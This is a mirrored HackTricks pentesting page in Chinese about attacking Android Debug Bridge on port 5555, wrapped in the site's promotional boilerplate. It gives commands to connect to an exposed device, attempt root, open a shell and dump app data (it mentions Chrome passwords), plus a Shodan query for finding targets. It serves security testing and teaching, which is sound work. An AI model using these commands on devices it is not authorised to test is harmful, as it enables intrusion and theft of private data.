mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
3.8 KiB
3.8 KiB
5555 - Android Debug Bridge
通过 htARTE (HackTricks AWS Red Team Expert)从零到英雄学习AWS黑客攻击!
支持HackTricks的其他方式:
- 如果你想在HackTricks中看到你的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享你的黑客技巧。
基本信息
Android Debug Bridge (adb) 是一个多功能的命令行工具,允许你与设备进行通信。adb命令支持多种设备操作,例如安装和调试应用程序,并提供访问Unix shell的能力,你可以使用它在设备上运行各种命令。(来源于这里)
默认端口:5555。
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
连接
如果发现ADB服务在设备的端口上运行,并且你可以连接到它,你可以在系统内获得一个shell:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
有关更多ADB命令,请查看以下页面:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
转储应用数据
为了完整下载应用程序的数据,您可以:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
你可以使用这个技巧来检索像chrome密码这样的敏感信息。更多信息请查看这里提供的信息和参考资料。
Shodan
android debug bridge
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS Red Team Expert)!
其他支持HackTricks的方式:
- 如果你想在HackTricks中看到你的公司广告或者下载HackTricks的PDF,请查看订阅计划!
- 获取官方的PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享你的黑客技巧。